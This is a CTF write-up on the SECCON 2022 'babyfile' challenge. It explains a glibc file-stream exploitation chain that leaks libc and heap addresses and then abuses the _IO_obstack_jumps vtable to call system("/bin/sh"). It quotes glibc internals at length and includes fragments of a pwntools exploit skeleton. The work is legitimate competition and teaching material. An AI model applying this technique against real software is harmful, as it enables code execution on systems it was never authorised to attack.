babyfile is a file stream exploitation I did during the SECCON CTF 2022 Quals event. I didn’t succeed to flag it within the 24 hours :(. But anyway I hope this write up will be interesting to read given I show another way to gain code execution – I have not seen before – based on _IO_obstack_jumps! The related files can be found here. If you’re not familiar with file stream internals, I advice you to read my previous writeups about file stream exploitation, especially this one and this other one.
TL;DR
Populate base buffer with heap addresses with the help of _IO_file_doallocate.
Make both input and output buffer equal to the base buffer with the help of _IO_file_underflow.
Partial overwrite on right pointers to get a libc leak by simply flushing the file stream.
Leak a heap address by printing a pointer stored within the main_arena.
_IO_obstack_overflow ends up calling a function pointer stored within the file stream we have control over which leads to a call primitive (plus control over the first argument). Then I just called system("/bin/sh\x00").
What we have
The challenge is basically opening /dev/null, asking for an offset and a value to write at fp + offset. And we can freely flush fp. The source code is prodided:
Get a libc leak by calling _IO_file_underflow to make input and output buffers equal to the base buffer that contains with the help of _IO_file_doallocate a heap address. And then flushing the file stream to leak the libc.
Get a heap leak by leaking a heap pointer stored within the main_arena.
Get an arbitrary write with a tcache dup technique, I got __free_hook as the last pointer available in the target tcache bin but I didn’t succeeded to get a shell >.<.
Call primitive with control over the first argument by calling _IO_obstack_overflow (part of the _IO_obstack_jumps vtable). Then it allows us to call system("/bin/sh\x00").
Libc leak
To get a libc leak we have to write on stdout a certain amount of bytes that leak a libc address. To do so we’re looking for a way to make interesting pointers appear as the base buffer to then initialize both input and output buffer to the base buffer and then do a partial overwrite on these fields to point to an area that contains libc pointers. To get heap addresses within the base buffer we can misalign the vtable in such a way that fp->vtable->sync() calls _IO_default_doallocate. Then _IO_default_doallocate is called and does some operations:
The initial state of the file stream looks like this:
Once we have a valid pointer into the base buffer, we try to get into both the input and output buffer the base pointer. Given the input / output buffer are NULL and that fp->flags is 0xfbad1800 | 0x8000 (plus 0x8000 => _IO_USER_LOCK to not stuck into fflush), we do not have issues with the checks. The issue with the _IO_SYSREAD call is described in the code below.
if (fp->_IO_buf_base == NULL) { /* Maybe we already have a push back pointer. */ if (fp->_IO_save_base != NULL) { free (fp->_IO_save_base); fp->_flags &= ~_IO_IN_BACKUP; } _IO_doallocbuf (fp); }
/* FIXME This can/should be moved to genops ?? */ if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED)) { /* We used to flush all line-buffered stream. This really isn't required by any standard. My recollection is that traditional Unix systems did this for stdout. stderr better not be line buffered. So we do just that here explicitly. --drepper */ _IO_acquire_lock (stdout);
/* This is very tricky. We have to adjust those pointers before we call _IO_SYSREAD () since we may longjump () out while waiting for input. Those pointers may be screwed up. H.J. */ fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base; fp->_IO_read_end = fp->_IO_buf_base; fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = fp->_IO_buf_base;
/* Given the vtable is misaligned, _IO_SYSREAD will call _IO_default_pbackfail, the code is given after _IO_new_file_underflow */ count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0) { if (count == 0) fp->_flags |= _IO_EOF_SEEN; else fp->_flags |= _IO_ERR_SEEN, count = 0; } fp->_IO_read_end += count; if (count == 0) { /* If a stream is read to EOF, the calling application may switch active handles. As a result, our offset cache would no longer be valid, so unset it. */ fp->_offset = _IO_pos_BAD; return EOF; } if (fp->_offset != _IO_pos_BAD) _IO_pos_adjust (fp->_offset, count); return *(unsignedchar *) fp->_IO_read_ptr; } libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)
int _IO_default_pbackfail (FILE *fp, int c) { if (fp->_IO_read_ptr > fp->_IO_read_base && !_IO_in_backup (fp) && (unsignedchar) fp->_IO_read_ptr[-1] == c) --fp->_IO_read_ptr; else { /* Need to handle a filebuf in write mode (switch to read mode). FIXME!*/ if (!_IO_in_backup (fp)) { /* We need to keep the invariant that the main get area logically follows the backup area. */ if (fp->_IO_read_ptr > fp->_IO_read_base && _IO_have_backup (fp)) { if (save_for_backup (fp, fp->_IO_read_ptr)) return EOF; } elseif (!_IO_have_backup (fp)) { // !! We should take this path cuz there is no save buffer plus we do not have the backup flag /* No backup buffer: allocate one. */ /* Use nshort buffer, if unused? (probably not) FIXME */ int backup_size = 128; char *bbuf = (char *) malloc (backup_size); if (bbuf == NULL) return EOF; fp->_IO_save_base = bbuf; fp->_IO_save_end = fp->_IO_save_base + backup_size; fp->_IO_backup_base = fp->_IO_save_end; } fp->_IO_read_base = fp->_IO_read_ptr; _IO_switch_to_backup_area (fp); } elseif (fp->_IO_read_ptr <= fp->_IO_read_base) { /* Increase size of existing backup buffer. */ size_t new_size; size_t old_size = fp->_IO_read_end - fp->_IO_read_base; char *new_buf; new_size = 2 * old_size; new_buf = (char *) malloc (new_size); if (new_buf == NULL) return EOF; memcpy (new_buf + (new_size - old_size), fp->_IO_read_base, old_size); free (fp->_IO_read_base); _IO_setg (fp, new_buf, new_buf + (new_size - old_size), new_buf + new_size); fp->_IO_backup_base = fp->_IO_read_ptr; }
Once we have the pointers at the right place, we can simply do some partial overwrites to the portion of the heap that contains a libc pointer. Indeed by taking a look at the memory at fp->_IO_base_buffer & ~0xff (to avoid 4 bits bruteforce) we can that we can directly reach a libc pointer:
int _IO_new_file_sync (FILE *fp) { ssize_t delta; int retval = 0;
/* char* ptr = cur_ptr(); */ if (fp->_IO_write_ptr > fp->_IO_write_base) if (_IO_do_flush(fp)) return EOF; delta = fp->_IO_read_ptr - fp->_IO_read_end; if (delta != 0) { off64_t new_pos = _IO_SYSSEEK (fp, delta, 1); if (new_pos != (off64_t) EOF) fp->_IO_read_end = fp->_IO_read_ptr; elseif (errno == ESPIPE) ; /* Ignore error from unseekable devices. */ else retval = EOF; } if (retval != EOF) fp->_offset = _IO_pos_BAD; /* FIXME: Cleanup - can this be shared? */ /* setg(base(), ptr, ptr); */ return retval; } libc_hidden_ver (_IO_new_file_sync, _IO_file_sync)
I already talked about the way we can gain arbitrary read with FSOP attack on stdout in this article. The way we will get a leak is almost the same, first we need to trigger the first condition in _IO_new_file_sync in such a way that fp->_IO_write_ptr > fp->_IO_write_base will trigger _IO_do_flush(fp). Then _IO_do_flush triggers the classic code path I dump right below. I will not comment all of it, the only thing you have to remind is that given most of the buffers are already initialized to a valid heap address beyond the target we do not have to rewrite them, this way we will significantly reduce the amount of partial overwrite.
staticsize_t new_do_write(FILE *fp, constchar *data, size_t to_do) { size_t count; if (fp->_flags & _IO_IS_APPENDING) /* On a system without a proper O_APPEND implementation, you would need to sys_seek(0, SEEK_END) here, but is not needed nor desirable for Unix- or Posix-like systems. Instead, just indicate that offset (before and after) is unpredictable. */ fp->_offset = _IO_pos_BAD; elseif (fp->_IO_read_end != fp->_IO_write_base) { off64_t new_pos = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1); if (new_pos == _IO_pos_BAD) return0; fp->_offset = new_pos; } count = _IO_SYSWRITE (fp, data, to_do); if (fp->_cur_column && count) fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1; _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base); fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base; fp->_IO_write_end = (fp->_mode <= 0 && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED)) ? fp->_IO_buf_base : fp->_IO_buf_end); return count; }
Note: Given fp->_IO_read_end != fp->_IO_write_base, fp->_IO_read_end is the save buffer that has been allocated and switched in _IO_default_pbackfail and that _IO_write_base contains the target memory area, we have to include the _IO_IS_APPENDING flag into fp->_flags to avoid the _IO_SYSSEEK which would fail and then return. Therefore we can finally reach the _IO_SYSWRITE that will leak the libc pointer.
To use the _IO_obstack_jumps technique, we have to craft a custom obstack structure on the heap (right on our filestream in fact) and thus we need to leak the heap to be able reference it. But given we already have a libc leak that’s very easy, within the main_arena are stored some heap pointers, which means we just have to use the same _IO_fflush trick to flush the filestream and then leak a heap pointer stored in the main_arena. I wrote a function that leaks directly the right pointer from a given address:
As far I know, obstack has never been used in CTF even though it can be leveraged as a very good call primitive (and as said before it needs a heap and libc to be used). Basically, the _IO_obstack_jumps vtable looks like this:
Given when _IO_SYNC is called in _IO_fflush the second argument is 0x1, we cannot call functions like _IO_obstack_xsputn that need buffer as arguments, that’s the reason why we have to dig into _IO_obstack_overflow.
staticint _IO_obstack_overflow (FILE *fp, int c) { structobstack *obstack = ((struct _IO_obstack_file *) fp)->obstack; int size;
/* Make room for another character. This might as well allocate a new chunk a memory and moves the old contents over. */ assert (c != EOF); obstack_1grow (obstack, c);
/* Setup the buffer pointers again. */ fp->_IO_write_base = obstack_base (obstack); fp->_IO_write_ptr = obstack_next_free (obstack); size = obstack_room (obstack); fp->_IO_write_end = fp->_IO_write_ptr + size; /* Now allocate the rest of the current chunk. */ obstack_blank_fast (obstack, size);
return c; }
The struct _IO_obstack_file is defined as follows:
structobstack /* controlcurrentobjectincurrentchunk */ { long chunk_size; /* preferred size to allocate chunks in */ struct _obstack_chunk *chunk;/* address of current struct obstack_chunk */ char *object_base; /* address of object we are building */ char *next_free; /* where to add next char to current object */ char *chunk_limit; /* address of char after current chunk */ union { PTR_INT_TYPE tempint; void *tempptr; } temp; /* Temporary for some macros. */ int alignment_mask; /* Mask of alignment for each object. */ /* These prototypes vary based on 'use_extra_arg', and we use casts to the prototypeless function type in all assignments, but having prototypes here quiets -Wstrict-prototypes. */ struct _obstack_chunk *(*chunkfun) (void *, long); void (*freefun) (void *, struct _obstack_chunk *); void *extra_arg; /* first arg for chunk alloc/dealloc funcs */ unsigned use_extra_arg : 1; /* chunk alloc/dealloc funcs take extra arg */ unsigned maybe_empty_object : 1; /* There is a possibility that the current chunk contains a zero-length object. This prevents freeing the chunk if we allocate a bigger chunk to replace it. */ unsigned alloc_failed : 1; /* No longer used, as we now call the failed handler on error, but retained for binary compatibility. */ };
Once obstack_1grow is called, if __o->next_free + 1 > __o->chunk_limit, _obstack_newchunk gets called.
/* Allocate a new current chunk for the obstack *H on the assumption that LENGTH bytes need to be added to the current object, or a new object of length LENGTH allocated. Copies any partial object from the end of the old chunk to the beginning of the new one. */
void _obstack_newchunk (struct obstack *h, int length) { struct _obstack_chunk *old_chunk = h->chunk; struct _obstack_chunk *new_chunk; long new_size; long obj_size = h->next_free - h->object_base; long i; long already; char *object_base;
/* Compute size for new chunk. */ new_size = (obj_size + length) + (obj_size >> 3) + h->alignment_mask + 100; if (new_size < h->chunk_size) new_size = h->chunk_size;
/* Allocate and initialize the new chunk. */ new_chunk = CALL_CHUNKFUN (h, new_size); if (!new_chunk) (*obstack_alloc_failed_handler)(); h->chunk = new_chunk; new_chunk->prev = old_chunk; new_chunk->limit = h->chunk_limit = (char *) new_chunk + new_size;
/* Compute an aligned object_base in the new chunk */ object_base = __PTR_ALIGN ((char *) new_chunk, new_chunk->contents, h->alignment_mask);
/* Move the existing object to the new chunk. Word at a time is fast and is safe if the object is sufficiently aligned. */ if (h->alignment_mask + 1 >= DEFAULT_ALIGNMENT) { for (i = obj_size / sizeof (COPYING_UNIT) - 1; i >= 0; i--) ((COPYING_UNIT *) object_base)[i] = ((COPYING_UNIT *) h->object_base)[i]; /* We used to copy the odd few remaining bytes as one extra COPYING_UNIT, but that can cross a page boundary on a machine which does not do strict alignment for COPYING_UNITS. */ already = obj_size / sizeof (COPYING_UNIT) * sizeof (COPYING_UNIT); } else already = 0; /* Copy remaining bytes one by one. */ for (i = already; i < obj_size; i++) object_base[i] = h->object_base[i];
/* If the object just copied was the only data in OLD_CHUNK, free that chunk and remove it from the chain. But not if that chunk might contain an empty object. */ if (!h->maybe_empty_object && (h->object_base == __PTR_ALIGN ((char *) old_chunk, old_chunk->contents, h->alignment_mask))) { new_chunk->prev = old_chunk->prev; CALL_FREEFUN (h, old_chunk); }
h->object_base = object_base; h->next_free = h->object_base + obj_size; /* The new chunk certainly contains no empty object yet. */ h->maybe_empty_object = 0; } # ifdef _LIBC libc_hidden_def (_obstack_newchunk) # endif
The interesting part of the function is the call to the CALL_CHUNKFUN macro that calls a raw unencrypted function pointer referenced by the obstack structure with either a controlled argument ((h)->extra_arg) or only with the size.
1 2 3 4 5 6 7
# define CALL_FREEFUN(h, old_chunk) \ do { \ if ((h)->use_extra_arg) \ (*(h)->freefun)((h)->extra_arg, (old_chunk)); \ else \ (*(void (*)(void *))(h)->freefun)((old_chunk)); \ } while (0)
If I summarize, to call system("/bin/sh" we need to have:
defremote(argv=[], *a, **kw): '''Connect to the process on the remote host''' io = pwn.connect(host, port) if pwn.args.GDB: pwn.gdb.attach(io, gdbscript=gdbscript) return io
defstart(argv=[], *a, **kw): '''Start the exploit against the target.''' if pwn.args.LOCAL: return local(argv, *a, **kw) else: return remote(argv, *a, **kw)